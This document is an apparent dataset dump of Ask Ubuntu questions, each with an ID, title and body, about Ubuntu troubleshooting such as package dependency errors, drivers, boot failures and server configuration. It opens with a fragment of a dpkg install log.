codeblocks-contrib-dbg_13.12-1_amd64.deb ) ... selecting previously unselected package codeblocks-dbg . unpacking codeblocks-dbg ( from codeblocks-dbg_13.12-1_amd64.deb ) ... preparing to replace codeblocks-dev 13.12-1 ( using codeblocks-dev_13.12-1_amd64.deb ) ... unpacking replacement codeblocks-dev ... preparing to replace codeblocks-headers 13.12-1 ( using codeblocks-headers_13.12-1_all.deb ) ... unpacking replacement codeblocks-headers ... preparing to replace codeblocks-libwxcontrib0 13.12-1 ( using codeblocks-libwxcontrib0_13.12-1_amd64.deb ) ... unpacking replacement codeblocks-libwxcontrib0 ... preparing to replace codeblocks-wxcontrib-dev 13.12-1 ( using codeblocks-wxcontrib-dev_13.12-1_amd64.deb ) ... unpacking replacement codeblocks-wxcontrib-dev ... preparing to replace codeblocks-wxcontrib-headers 13.12-1 ( using codeblocks-wxcontrib-headers_13.12-1_all.deb ) ... unpacking replacement codeblocks-wxcontrib-headers ... preparing to replace libcodeblocks0 13.12-1 ( using libcodeblocks0_13.12-1_amd64.deb ) ... unpacking replacement libcodeblocks0 ... preparing to replace libwxsmithlib0 13.12-1 ( using libwxsmithlib0_13.12-1_amd64.deb ) ... unpacking replacement libwxsmithlib0 ... preparing to replace libwxsmithlib0-dev 13.12-1 ( using libwxsmithlib0-dev_13.12-1_amd64.deb ) ... unpacking replacement libwxsmithlib0-dev ... preparing to replace wxsmith-dev 13.12-1 ( using wxsmith-dev_13.12-1_amd64.deb ) ... unpacking replacement wxsmith-dev ... preparing to replace wxsmith-headers 13.12-1 ( using wxsmith-headers_13.12-1_all.deb ) ... unpacking replacement wxsmith-headers ... dpkg : dependency problems prevent configuration of codeblocks : codeblocks depends on libfontconfig1 ( > = 2.9.0 ) ; however : version of libfontconfig1 on system is 2.8.0-3ubuntu9.1 . dpkg : error processing codeblocks ( -- install ) : dependency problems - leaving unconfigured setting up codeblocks-common ( 13.12-1 ) ... dpkg : dependency problems prevent configuration of codeblocks-contrib : codeblocks-contrib depends on libfontconfig1 ( > = 2.9.0 ) ; however : version of libfontconfig1 on system is 2.8.0-3ubuntu9.1 . codeblocks-contrib depends on libgamin0 ; however : package libgamin0 is not installed . codeblocks-contrib depends on codeblocks ( = 13.12-1 ) ; however : package codeblocks is not configured yet . dpkg : error processing codeblocks-contrib ( -- install ) : dependency problems - leaving unconfigured setting up codeblocks-contrib-common ( 13.12-1 ) ... dpkg : dependency problems prevent configuration of codeblocks-contrib-dbg : codeblocks-contrib-dbg depends on codeblocks-contrib ( = 13.12-1 ) ; however : package codeblocks-contrib is not configured yet . dpkg : error processing codeblocks-contrib-dbg ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of codeblocks-dbg : codeblocks-dbg depends on codeblocks ( = 13.12-1 ) ; however : package codeblocks is not configured yet . dpkg : error processing codeblocks-dbg ( -- install ) : dependency problems - leaving unconfigured setting up codeblocks-libwxcontrib0 ( 13.12-1 ) ... setting up codeblocks-wxcontrib-dev ( 13.12-1 ) ... setting up codeblocks-wxcontrib-headers ( 13.12-1 ) ... setting up libcodeblocks0 ( 13.12-1 ) ... setting up libwxsmithlib0 ( 13.12-1 ) ... setting up wxsmith-dev ( 13.12-1 ) ... setting up wxsmith-headers ( 13.12-1 ) ... setting up libwxsmithlib0-dev ( 13.12-1 ) ... setting up codeblocks-dev ( 13.12-1 ) ... setting up codeblocks-headers ( 13.12-1 ) ... processing triggers for shared-mime-info ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : amd64.deb codeblocks codeblocks-contrib codeblocks-contrib-dbg codeblocks-dbg
442786	impossible to customize all aspects of lubuntu theme from gui	i would turn the default lubuntu theme into a dark theme , but it seems impossible to change from the gui : the color of inactive tabs in panel the background of pcmanfm places the theme of gnome programs ( gedit , file-roller , ... ) i would change them manually , but where can they be modified ?
442787	unable to login from gui ?	running 13.10 x64 on an ubuntu laptop ( system 76 kudu professional ) . when i bootup and provide my password ; the screen goes black for a moment then returns to the login screen . switching tty i am able to login ; then start x ( using startx or startx unity ) . how do i resolve this issue ?
442789	a nifty tool for checking whether the expected hadoop processes are running is jps : : problem	hadoopz @ ubuntu : /usr/local/hadoop $ jps the program 'jps ' can be found in the following packages : openjdk-7-jdk openjdk-6-jdk ask your administrator to install one of them when i check jps for hadoop , i am getting the above result ... .
442793	how to install err in a python 3 virtual environment ?	i 'm trying to install err on ubuntu server 12.04.4 . it requires python plus a bunch of dependencies . when i followed the install instructions , i could n't get it to work using the `` default '' which appeared to be python 2.7 . there seems to be a circular dependency in sleekxmpp ( one of the requirements ) : importerror : can not import name resolver so my idea is to use python 3 instead . my system has all of this installed : python install python-apt-common install python-dbus-dev install python-minimal install python-pip install python-pkg-resources install python-setuptools install python2.7 install python2.7-minimal install python3 install python3-minimal install python3.2 install python3.2-minimal install when i use pip to install stuff , i have no idea if it 's using python 2 , or 3 , or really , what anything is using ( i ca n't see how to control which version of packages to install , what version of python these packages are based on with pip freeze ) . i just want to have an environment that uses the latest version of python 3 without all this other stuff confusing me . so i tried installing virtualenv and setting up the environment , but it appears to just be another python2.7 environment . in short i have no idea what 's going on , and need some pointers .
442794	check if the password has changed yet	i am supposed to ask the user to change his password then wait for some time then check if he has changed it how can i check if the password has been changed ? ?
442795	how to shutdown ubuntu after ( 2 hours ) of idle ?	running : xubuntu 14.04 32bit . i have read several outdated , not working , working different that i want answers here and elsewhere . i had a script that resulted in shutting my laptop down at boot time after i set it to autostart . i also tryed it install complexshutdown despite that this tool died in 2011 and has a bug on lauchpad that his exact option is not available . it not even installed on 14.04 here . so if i may ask this question again without being punished with `` duplicate of '' ... i am looking for a simple straight forward script that is actually tested and working that i can put into the autostart that is doing nothing but checking for activity ( mouse/keyboard ) and shutting down my laptop if there was none for 2 hours . thanks .
442798	how to highlight an warning message ?	i want to hightlight the warning message appears while running a specific command . if we accidentally run some specific commands ( it may be removing essential system pacakges ) , it shows some warning message before the action which was going to be done . but the warning message is not in an highlighted form . some people may read the warning message and cancel the operation but some may execute the command without reading the warning message.and finally got his/her system broken . example 1 : avinash @ linux : ~ $ sudo apt-get purge firefox reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : firefox* lightdm-remote-session-uccsconfigure* xul-ext-unity* xul-ext-webaccounts* 0 upgraded , 0 newly installed , 4 to remove and 300 not upgraded . after this operation , 63.1 mb disk space will be freed . do you want to continue [ y/n ] ? in the above example , there is no need for the warning message.because firefox is not an essential package . system will also run smoothly , if we remove firefox package . example 2 : avinash @ linux : ~ $ sudo apt-get purge hostname reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : hostname* warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! hostname 0 upgraded , 0 newly installed , 1 to remove and 301 not upgraded . after this operation , 85.0 kb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] in this example , the hostname package is a must important essential package.if you remove this packge , your system will be broken . so , is that possible to highlight ( in red colour or in bold text ) only the warning message if that command is intended to produce an warning message before doing a particular operation ? warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing !
442800	send message computer same wifi ?	am at school and they all use the same wifi .. i wanted to ask how can i send a message from terminal or something to a girl that i like ! i only know the name of his computer nothing other ! !
442801	kubuntu network management gui shows no networks	for the past couple of weeks , the network management widget on kubuntu has shown no networks ( equally , running the gnome widget has the same problem ) i can still network via the command line but this is quite inconvenient . any ideas about how i can go about sorting this out ? on the command line , i can connect to networks in the normal way , sudo iwconfig wlan0 essid ... sudo dhclient wlan0 i should have also added that the networkmanager.state has everything as true : [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true and the networkmanager.conf is : [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=true cheers , t .
442802	vsftpd wont start on rackspace host	i have a server on rackspace that i wish to enable ftp on . however , i can not get the service to start . using the exact same setup on a local virtualbox , ( same distro , kernel , vsftpd installation steps , and same configuration file /etc/vsftpd.conf ) , it works perfectly . the config file at /etc/vsftpd.conf is as follows : listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes # chroot_local_user=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem it also appears that nothing gets added to the log file at /var/log/vsftpd.log i believe the service never starts correctly because i can never see the port 21 open when using nmap , and whenever i perform sudo service vsftpd restart , i get stop : unknown instance : instead of vsftpd stop/waiting . however i never see any kind of error message . i checked the /var/run/vsftpd/empty directory exists as well as the rsa cert file . i also tried temporarily disabling the ufw firewall ( although it already allows port 21 ) . are there any other permissions/configurations i need to check ? uname -a output : 3.8.0-38-generic # 56~precise1-ubuntu smp thu mar 13 16:22:48 utc 2014 x86_64 x86_64 x86_64 gnu/linux update the output of /var/log/syslog is as follows : 3 12:35:15 annonymous kernel : [ 18271.505345 ] bug : bad page map in process vsftpd pte:8000000000000165 pmd:1b03f067 apr 3 12:35:15 annonymous kernel : [ 18271.505358 ] page : ffffea0000000000 count : -174 mapcount : -174 mapping : ( null ) index:0x0 apr 3 12:35:15 annonymous kernel : [ 18271.505367 ] page flags : 0x14 ( referenced|dirty ) apr 3 12:35:15 annonymous kernel : [ 18271.505377 ] addr:00007f315f3bc000 vm_flags:00100071 anon_vma : ffff88001b0af180 mapping : ( null ) index:7f315f3bc apr 3 12:35:15 annonymous kernel : [ 18271.505389 ] pid : 26581 , comm : vsftpd tainted : g b 3.8.0-38-generic # 56~precise1-ubuntu apr 3 12:35:15 annonymous kernel : [ 18271.505391 ] call trace : apr 3 12:35:15 annonymous kernel : [ 18271.505399 ] [ < ffffffff8115c3a9 > ] print_bad_pte+0x1d9/0x270 apr 3 12:35:15 annonymous kernel : [ 18271.505403 ] [ < ffffffff8115e53e > ] zap_pte_range+0x3de/0x440 apr 3 12:35:15 annonymous kernel : [ 18271.505408 ] [ < ffffffff81005dc0 > ] ? xen_make_pte+0x20/0x70 apr 3 12:35:15 annonymous kernel : [ 18271.505412 ] [ < ffffffff8100544d > ] ? __raw_callee_save_xen_make_pte+0x11/0x1e apr 3 12:35:15 annonymous kernel : [ 18271.505415 ] [ < ffffffff81005489 > ] ? __raw_callee_save_xen_pmd_val+0x11/0x1e apr 3 12:35:15 annonymous kernel : [ 18271.505419 ] [ < ffffffff8115e766 > ] unmap_page_range+0x1c6/0x320 apr 3 12:35:15 annonymous kernel : [ 18271.505424 ] [ < ffffffff81142369 > ] ? __pagevec_lru_add_fn+0xb9/0xf0 apr 3 12:35:15 annonymous kernel : [ 18271.505428 ] [ < ffffffff8115e947 > ] unmap_single_vma+0x87/0x100 apr 3 12:35:15 annonymous kernel : [ 18271.505432 ] [ < ffffffff8115f204 > ] unmap_vmas+0x54/0xa0 apr 3 12:35:15 annonymous kernel : [ 18271.505435 ] [ < ffffffff8116756c > ] exit_mmap+0x9c/0x170 apr 3 12:35:15 annonymous kernel : [ 18271.505440 ] [ < ffffffff8105788a > ] mmput.part.22+0x4a/0x120 apr 3 12:35:15 annonymous kernel : [ 18271.505444 ] [ < ffffffff81057989 > ] mmput+0x29/0x30 apr 3 12:35:15 annonymous kernel : [ 18271.505447 ] [ < ffffffff8105fd3a > ] exit_mm+0x10a/0x130 apr 3 12:35:15 annonymous kernel : [ 18271.505451 ] [ < ffffffff810fbd55 > ] ? taskstats_exit+0x45/0x270 apr 3 12:35:15 annonymous kernel : [ 18271.505455 ] [ < ffffffff816f66f5 > ] ? _raw_spin_lock_irq+0x15/0x20 apr 3 12:35:15 annonymous kernel : [ 18271.505459 ] [ < ffffffff8105fec3 > ] do_exit+0x163/0x480 apr 3 12:35:15 annonymous kernel : [ 18271.505463 ] [ < ffffffff8119c9e0 > ] ? vfs_write+0x110/0x180 apr 3 12:35:15 annonymous kernel : [ 18271.505467 ] [ < ffffffff81060274 > ] do_group_exit+0x44/0xa0 apr 3 12:35:15 annonymous kernel : [ 18271.505471 ] [ < ffffffff810602e7 > ] sys_exit_group+0x17/0x20 apr 3 12:35:15 annonymous kernel : [ 18271.505475 ] [ < ffffffff816ff25d > ] system_call_fastpath+0x1a/0x1f apr 3 12:35:15 annonymous kernel : [ 18271.505560 ] bug : bad rss-counter state mm : ffff880004b48b40 idx:0 val : -1 apr 3 12:35:15 annonymous kernel : [ 18271.585722 ] bug : bad rss-counter state mm : ffff880004b48b40 idx:1 val:1 apr 3 12:35:15 annonymous kernel : [ 18271.597942 ] bug : bad page map in process vsftpd pte:8000000000000165 pmd:02463067 apr 3 12:35:15 annonymous kernel : [ 18271.597962 ] page : ffffea0000000000 count : -175 mapcount : -175 mapping : ( null ) index:0x0 apr 3 12:35:15 annonymous kernel : [ 18271.597973 ] page flags : 0x14 ( referenced|dirty ) apr 3 12:35:15 annonymous kernel : [ 18271.597985 ] addr:00007fe0c9a67000 vm_flags:00100071 anon_vma : ffff88001b0af500 mapping : ( null ) index:7fe0c9a67 apr 3 12:35:15 annonymous kernel : [ 18271.597999 ] pid : 26584 , comm : vsftpd tainted : g b 3.8.0-38-generic # 56~precise1-ubuntu i am guessing that a bad page map error is the result of the fact that i am using a large amount of the memory and gone into swap ?
442804	ubuntu 12.10 crashes during start up	i have been using ubuntu 12.10 without any problems but it started recently to crash during start up or login . i ran memtest and everything seems fine . the crash screen is something like : any suggestions ?
442807	i want to disappear from windows network	by this i mean to not come up as ( linux-pc ) when a windows user opens network neighbourhood . unplugging is not an option , as i am running a multiplayer server every now and then , which we connect to via ip address . is there something in samba config etc that i can change to not advertise my linux pc while still having an ip address assigned ?
442809	hp pavilion dv5201 running 12.04 lts 32 bit will not connect wirelessly . no problem connecting with ethernet	trialling ubuntu 12.04lts from dvd on a hp pavilion dv5201 laptop . i can get internet via ethernet connection to my router , but not wirelessly . the drop down menus ask questions i can not answer , such as bssid etc etc . i also can not see any network displayed to which i might connect . i am not a computer programmer , so simple answers if possible please . gordon thompson
442813	how to remove openjdk 6 from ubuntu 13.04 ?	when i do sudo apt-cache search openjdk i got : default-jdk - standard java or java compatible development kit default-jdk-doc - standard java or java compatible development kit ( documentation ) default-jre - standard java or java compatible runtime default-jre-headless - standard java or java compatible runtime ( headless ) icedtea-7-jre-jamvm - alternative jvm for openjdk , using jamvm icedtea-7-plugin - web browser plugin based on openjdk and icedtea to execute java applets openjdk-7-dbg - java runtime based on openjdk ( debugging symbols ) openjdk-7-demo - java runtime based on openjdk ( demos and examples ) openjdk-7-doc - openjdk development kit ( jdk ) documentation openjdk-7-jdk - openjdk development kit ( jdk ) openjdk-7-jre - openjdk java runtime , using hotspot jit openjdk-7-jre-headless - openjdk java runtime , using hotspot jit ( headless ) openjdk-7-source - openjdk development kit ( jdk ) source files java-package - utility for creating java debian packages freemind - java program for creating and viewing mindmaps icedtea-6-jre-cacao - alternative jvm for openjdk , using cacao icedtea-6-jre-jamvm - alternative jvm for openjdk , using jamvm icedtea-6-plugin - web browser plugin based on openjdk and icedtea to execute java applets jtreg - regression test harness for the openjdk platform jvm-7-avian-jre - lightweight virtual machine using the openjdk class library libreoffice - office productivity suite ( metapackage ) openjdk-6-dbg - java runtime based on openjdk ( debugging symbols ) openjdk-6-demo - java runtime based on openjdk ( demos and examples ) openjdk-6-doc - openjdk development kit ( jdk ) documentation openjdk-6-jdk - openjdk development kit ( jdk ) openjdk-6-jre - openjdk java runtime , using hotspot jit openjdk-6-jre-headless - openjdk java runtime , using hotspot jit ( headless ) openjdk-6-jre-lib - openjdk java runtime ( architecture independent libraries ) openjdk-6-jre-zero - alternative jvm for openjdk , using zero/shark openjdk-6-source - openjdk development kit ( jdk ) source files openjdk-7-jre-zero - alternative jvm for openjdk , using zero/shark uwsgi-app-integration-plugins - plugins for integration of uwsgi and application uwsgi-plugin-jvm-openjdk-6 - java plugin for uwsgi ( openjdk 6 ) uwsgi-plugin-jvm-openjdk-7 - java plugin for uwsgi ( openjdk 7 ) uwsgi-plugin-jwsgi-openjdk-6 - jwsgi plugin for uwsgi ( openjdk 6 ) uwsgi-plugin-jwsgi-openjdk-7 - jwsgi plugin for uwsgi ( openjdk 7 ) openjdk-7-jre-lib - openjdk java runtime ( architecture independent libraries ) i tried to remove jdk-6 using : sudo apt-get remove openjdk-6-jdk i got result as : reading package lists ... done building dependency tree reading state information ... done package 'openjdk-6-jdk ' is not installed , so not removed the following package was automatically installed and is no longer required : libc6-i386 use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . i want to uninstall openjdk-6-jdk , but should not remove openjdk-7-jdk , expecting solution .
442815	dual boot ubuntu full disk encrypted but windows untouched	i have been dual booting ubuntu and windows 7 for a while now . in the past , i have used the `` encrypt home folder '' option to add ( some ) security to my installation ( ie . now no one can easily steal my home folder 's contents by booting a live cd or using windows to access my ubuntu root partition ) . this is why i was excited to learn about the new full disk encryption option in 13.10 . i was able to successfully burn and boot the dvd . however , disk encryption and home folder encryption are not available options under `` install along side them [ the other operating system ( s ) ] '' . since i do not want to lose the windows installation , i obviously do not want to select `` erase disk '' . basically , here is what i would like to happen : power on > bios > grub > user choice ( windows or ubuntu ) user choice ( windows ) > non-encrypted , normal windows ( no encryption pass-phrase required ) user choice ( ubuntu ) > encrypted ubuntu 13.10 installation ( with pass-phrase required )
442816	how to retrieve lost profile in thunderbird ?	i have lost my emails and my email profile when i went to the terminal and sudo thunderbird restart . when i opened it my whole profile and email was dissapeared . i seemed to have lost them all . how can i retrieve and restore my emails and my email profile ?
442817	how to activate radeon dynamic power management ?	i 've just installed ubuntu 14.04 , i 'm not sure if radeon dynamic power management is working because the laptop is hotter than my previous ubuntu 12.04.4 with kernel 3.11 plus adding the kernel parameter `` radeon.dpm=1 '' added in line grub_cmdline_linux_default= '' quiet splash '' . please , could someone confirm that dpm is active out of the box in kernel 3.13 ?
442819	unable to install ubuntu on	i tried to install ubuntu 12.04 from a live usb , but was unable to get into the live environment when i selected try ubuntu without installing option . then i tried again by selecting install ubuntu option at the grub screen . this time i got the initial screen , but it appeared broken . so , i could n't continue . the hardware is an ivy bridge intel processor , intel pentium g2020 , the motherboard is gigabyte h61m-s1 , with 2gb ram . the available hardware details of the machine , generated by cpu-z application in windows , can be found at this link could not get into the live cd environment , so had to use cpu-z . is it a graphics , issue with the on-board graphics ; if so , any way to overcome it ? how can i install ubuntu 12.04 , in this machine ?
442823	iso not bootable ?	i burnt the iso linux image file to my cd to install it on my laptop , but my laptop says my cd is not bootable ! how can i fix this ?
442828	edit an icc profile	my laptop monitor is currently set up with an existing icc profile , however , the color temperature is somewhat annoying at the default 6400k value . after some testing i found out , that 6000k is quite good , but setting it everytime with redshift is hacky . so the solution would be editing the icc profile itself . for this i have tried to use colormgr without success . does anybody know a solution ?
442829	ubuntu does n't recognize lsi megaraid 9240 ( asus rog motherboard )	i have an lsi megaraid 9240 4i raid controller . when i put it in my computer i can configure it for raid1 , the bios recognizes it , but the ubuntu installer hangs with `` no media found '' . i use a flash drive created with startupdiskcreator . i have an asus rog formula motherboard . when i boot my computer from another harddisk , with the raid controller inserted , raid1 configured with two disks , ubuntu hangs in an initramfs prompt , it says it ca n't find a drive with uuid= ... . i did install the lsi ubuntu driver on my system . i wanted to have a 3ware card because that 's working well in another computer , 3ware is now lsi , but this card apparently is different from the other one . any suggestions on what i can do to make ubuntu see the drive ? i 'm about to ditch the card , it takes too much time trying to make it work . if anyone can recommend a card that definitely works with ubuntu , i 'd appreciate .
442837	wifi connection problem on hp pavilion dv8	i have an hp pavilion dv8 . i installed ubuntu 12.04 to replace windows xp home edition and did an update to 12.04.1 . the connection to my belkin router was fine during installation and did not disconnect . after restarting for the update , the pc could not obtain an ip address , although it was seeing the router with good signal strength . the only solution i know of is to reboot the router , and then the connection is re-established . this happens every time i shut down or restart . packages are up to date . output of rfkill list all : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no output of sudo lshw -class network : *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 02 serial : [ removed ] width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless having done a search and reading somewhere about ca certs i am beginning to suspect that might be my problem ? i have since learned that there is an ip address conflict , windows 7 pc trying to connect to the router . it appears that when ubuntu connects to the router ( after reboot of router ) the ip address is retained by the router after ubuntu pc is shut down .
442838	fingerprint reader driver for validity sensors fingerprint scanner	prakhar @ pr3d4tor : ~ $ lsusb -s 001:003 -v bus 001 device 003 : id 138a:0018 validity sensors , inc. fingerprint scanner could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 255 vendor specific class bdevicesubclass 17 bdeviceprotocol 255 bmaxpacketsize0 8 idvendor 0x138a validity sensors , inc. idproduct 0x0018 fingerprint scanner bcddevice 0.78 imanufacturer 0 iproduct 0 iserial 1 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 46 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 4 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 4 i have searched high and low but i can not get this to work . all questions related to 138a:0018 are either unanswered or old . any help guys ?
442843	what are duty of locale and locale-gen commands ?	i know in order to understand how commands work , we should use man page . but for command locale and locale-gen . i did not got the exact meaning and their duty . i need some more description about their jobs and the relation between locale and locale-gen. based on man locale : locale - get locale-specific information . ok what is locale ? ? description the locale program writes information about the current locale environ��� ment , or all locales , to standard output . what is locale environment ?
442847	how to create icon on desktop	now these days i am customizing ubuntu and i want some icons on my desktop in customizes os like my computer home trash how can i create these icons on my desktop . and i am in chroot environment so i can use only terminal to do any thing with my customize os . so please tell me how can i do that with the help of terminal .
442848	web pages displaying only text and some are not working at all	i am dealing with very painful problem and do n't have idea how to get rid of it . i have ubuntu 12.04 lts and some web pages are displaying only text . for instance web page facebook.com , youtube.com , askubuntu.com and some pages are not working at all . i tried browsers firefox , chrome , rekonq but the problem still persists . this problem is on all machines with ubuntu , windows machines in the same network are ok ( exceptionally : - ) ) one thing : if i do search at google.com and try to click one of the first three ads in google search results , the webpage can not be loaded ( server not found ) . i think it has to do something with flash , but i do have gnash installed . one more thing : if i connect my ubuntu laptop to 3g network ( created by my mobile phone ) , the problem disappears ... does anyone have an idea how to fix this problem ? thank you , martin
442849	debian package creation without a configure script	i 've been trying to package an in house code project but have been having trouble . i can create a package , but the actual binaries are not installed when i run sudo dpkg -i proj_1.0.0+svn02042014-1_amd64.deb i expect this is because there is no 'configure ' script in the project , and no reference to $ destdir . instead , when running make install , it just calls a perl script that deploys the files to a dir specified on the terminal . to create the debian package i have been doing the following : tar -pczf proj-1.0.0+svn02042014.tar.gz proj-1.0.0+svn02042014/ dh_make -e blah @ blah.com -f ../proj-1.0.0+svn02042014.tar.gz dpkg-buildpackage -rfakeroot when running dpkg -- contents proj_1.0.0+svn02042014-1_amd64.deb i can clearly see that the binaries are not in the package . the only things that are in there are some doc files ( i.e . doc\readme ) i 'm guessing that using dpkg-buildpackage without a configure script is not possible ? is this the case ? thanks for attention edit : proj-1.0.0+svn02042014.tar.gz looks something like : proj-1.0.0+svn02042014/ -- makefile -- src/ -- -- install.pl -- -- makefile -- -- blah.cpp
442851	how can i get my monitor 's maximum resolution without the proprietary amd graphic driver installed ?	i am using ubuntu 14.04 . i have an amd radeon 5570 hd graphic card . actually , the default open source redwood drivers are n't allowing me to choose my monitor 's maximum screen resolution ( which is 1366 x 768 ) . i just have two resolutions displayed which are 1024x768 and 800x600 . if i give the command : xrandr -s 1366x768 then the output is : size 1366x768 not found in available modes so just for the sake of getting 1366x768 resolution i am forced to install the proprietary graphic driver that amd gives me from its site . but if i install it ( which itself is quite a problem-prone process ) , i undergo a lot of 'inconvenience ' . sometimes after an os update , the driver crashes unity . then i will have to uninstall that driver from a tty and google around for a solution . also i encounter screen tearing problems occasionally . in addition i also cant see my login screen ( see this question which states this particular problem ) . the main problem is amd does not update its driver as quick as ubuntu updates its os . this is quite irritating . so , i want the maximum resolution ( and performance ) that my graphics card and monitor can give me without installing the 'problematic ' proprietary graphic card driver that amd gives . is this possible ? suggestions please . thanks in advance . ps : - more system specs details : - intel i3 2100 processor amd p8h61-m plus2 motherboard amd radeon 5570 hd graphic card dell monitor ( btw , thank you for reading through my elaborate description ! )
442852	unity tweak tool : how to disable window switching shortcuts ?	i found the `` unity tweak tool '' the other day , and today i played around a bit ... and today i wanted to make some adaptions for the task switcher . there is a field for windows switcher shortcuts ; and i am wondering : how on earth would i disable shortcuts ? example : it says start switcher for all workspaces i can now click on `` '' and it then says `` new shortcut '' ... but well , i dont want to set a shortcut . and i could not find a way to get it to show `` disabled '' like it does for other entries . any idea how that would work ?
442855	excellent ruler software that can freely rotate	i 've used kruler and screenruler , but they do not fit my purposes as they ca n't rotate freely . so , is there any ruler software that allows freehand rotation ? to be honest , a simple rectangle shape on the screen that i can freely move , rotate and resize its length is more than enough for me
442860	epson expression premium xp-700	how to install epson expression premium xp-700 printer into desktop ubuntu 13:10 . it detects the network printer but then looks for a driver but does not find one .
442861	ubuntu 13.10 kernel panic not syncing vfs while trying to installing	i like to ask about the installation of ubuntu 13.10 . i have burn it in my dvd and boot from my dvd drive , after a couple of seconds there is a purple screen and a small rectangle and a human being inside a circle , after that there is a black screen and an error is displayed : [ 6.100308 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown - block ( 0,0 ) i have windows 7 installed first and now i am trying to have a dual boot of this two oses . thank you . hope you can answer this .
442863	( 23634 ) wsgi starting up on http : //0.0.0.0:8080/	i have followed tutorial to install openstack from here http : //ilearnstack.com/2013/04/26/setting-up-a-single-node-openstack-environment/ ( http : //ilearnstack.com/2013/04/26/set ... ) and i tried to install savanna when i execute this command savanna-venv/bin/python savanna-venv/bin/savanna-api -- config-file savanna-venv/etc/savanna.conf no progress shows and terminal is stuck and keeps showing this for long time , and does nothing . warning keystoneclient.middleware.auth_token [ - ] configuring auth_uri to point to the public identity endpoint is required ; clients may not be able to authenticate against an admin endpoint ( 23634 ) wsgi starting up on http : //0.0.0.0:8080/
442865	how to lower the resolution of a laptop monitor ?	i am using laptop dell inspiron 5421 . now with an accident the 1/3rd of my left side screen is damaged . now i was wondering is there any way so that i could shrink the screen size to other 2/3rd of my laptop ?
442866	publishing my first application on ppa ( launchpad )	let 's say that i have a little script that outputs `` hello world ! '' in terminal : echo `` hello world ! '' how can i publish it to launchpad ppa so i can type : sudo add-apt-repository ppa : myusername/hello-world & & sudo apt-get update sudo apt-get install hello-world then running hello-world in terminal the application will output `` hello world ! '' . i read the instructions from this page , but the image is blurry for me ...
442870	how do i create an alias that displays the contents of a `history list` ?	how do i create a new alias command called cet103demo which displays the contents of the bash history list one page at a time , and also making sure the new alias is automatically loaded when the virtual machine starts up ?
442872	problem with boot after ubuntu touch	i wanted to try out ubuntu touch so i downloaded and installed on my laptop . now ubuntu wo n't boot ! please help . the screen shows : could n't find data partition . spawning adbd /scripts/panic/adbd : line 22 : ca n't create /sys/class/android_usb/andoid0/idvendor : nonexistent directory /scripts/panic/adbd : line 23 : ca n't create /sys/class/android_usb/andoid0/idproduct : nonexistent directory /scripts/panic/adbd : line 24 : ca n't create /sys/class/android_usb/andoid0/functions : nonexistent directory /scripts/panic/adbd : line 25 : ca n't create /sys/class/android_usb/andoid0/enable : nonexistent directory install_listener ( 'tcp:5037 ' , '*smartsocket* ' ) using usb any idea what this means ? is there any way to uninstall this and go back to just using ubuntu . i seem to be learning a lot about what not to do in linux lately .
442877	not able to boot ubuntu after windows drive format	i formatted one of the partitions of my windows 8 drive after which my ubuntu is not booting . i am using a dual boot system with ubuntu 12.04 release . on booting , grub menu is displayed properly . since it was not booting , i tried booting in recovery mode . i was able to get into recovery mode but fsck was getting stuck . so i went to root shell . i verified that all my data is present but fsck was failing with uuid error . on looking at /etc/fstab and blkid output , the uuid displayed for '/ ' as well as swap were different . i modified the uuid in fstab to the ids displayed in blkid . still problem remains the same . when ubuntu boots , it just hangs with no error getting displayed , verified this in boot console . seems like when windows drive is formatted , partition table got changed . please suggest on how to recover from this problem . note : i am not able to capture the output of commands as it is booting only in recovery mode . also when i try to enable network in recovery mode , that also hangs . regards , manjul
